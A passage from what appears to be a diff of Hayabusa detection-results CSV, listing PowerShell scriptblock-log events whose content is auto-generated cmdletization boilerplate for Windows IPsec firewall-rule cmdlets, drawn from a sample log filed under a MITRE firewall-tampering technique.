$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.Contains",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; 